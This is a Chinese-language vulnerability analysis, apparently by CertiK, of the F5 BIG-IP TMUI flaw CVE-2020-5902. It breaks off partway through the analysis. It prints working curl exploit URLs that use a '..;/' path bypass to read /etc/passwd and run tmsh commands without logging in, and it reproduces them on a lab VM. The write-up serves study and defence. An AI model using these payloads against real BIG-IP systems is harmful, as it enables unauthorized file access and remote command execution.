背景 F5BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。Positive Technologies的研究人员Mikhail Klyuchnikov发现其配置工具Traffic Management User Interface(TMUI)中存在远程代码执行漏洞,CVE编号为CVE-2020-5902。该漏洞CVSSv3评分为10分,攻击者可利用该漏洞创建或删除文件,关闭服务、执行任意的系统命令,最终获得服务器的完全控制权。详细信息请查看参考链接1。
受影响的BIG-IP软件版本: - 【15.0.0-15.1.0.3】 - 【14.1.0-14.1.2.5】 - 【13.1.0-13.1.3.3】 - 【12.1.0-12.1.5.1】 - 【11.6.1-11.6.5.1】
漏洞利用: - 读取任意文件: curl -k "https://[F5Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" - 远程执行tmsh命令: curl -k "https://[F5Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin" 官方给出的临时修复方案(后文会对修复进行分析):?
漏洞复现: 在F5的官网注册账号之后,可以从F5的资源库中下载存在漏洞的BIG-IP软件。访问参考链接2可以下载BIG-IP TMOS (Traffic Management Operating System, 流量管理操作系统) 的虚拟机镜像。CertiK技术团队因为使用Vmware Fusion,下载的是 "BIGIP-15.0.0-0.0.39.ALL_1SLOT-vmware.ova-ImagefilesetforVMwareESX/iServer"。
在Vmware Fusion中加载镜像(import): 加载完成之后,使用默认用户名密码登录系统: - 用户名: root - 密码: default
系统初始化之后,使用 "ifconfig" 命令查询虚拟机IP地址。CertiK技术团队的BIG-IP TMMUI虚拟机IP地址为"172.16.4.137"。
在浏览器中访问BIG-IP TMUI登录界面: https://172.16.4.137/tmui/login.jsp
复现任意文件读取: 在浏览器中访问以下地址可以读取 "/etc/passwd" 文件内容: https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
复现tmsh命令执行: https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
漏洞分析: 在进入漏洞分析前,先要明确一点:漏洞利用中的 fileRead.jsp 和 tmshCmd.jsp 文件在用户登陆后本身是可以被访问的。
下面的截图显示了登陆前和登陆后访问以下URL的区别: https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd 登陆前访问: - 被跳转回登陆界面 输入账号密码登陆管理界面之后再访问,可执行 fileRead.jsp 读取文件。
fileRead.jsp 和 tmshCmd.jsp 虽然是在PoC中最终被利用的文件,但是他们并不是漏洞的起因。此漏洞的本质是利用 Apache 和后台 Java (tomcat) 对URL的解析方式不同来绕过登陆限制,在未授权的情况下访问后台 JSP 模块。CertiK技术人员第一次注意到此类型漏洞是在2018年Orange的Black Hat演讲: "Breaking Parser Logic: Take Your Path Normalization Off and Pop 0-Days Out"。详细内容请查看参考链接3。
在F5 BIG-IP的后台服务器对收到的URL请求进行了两次
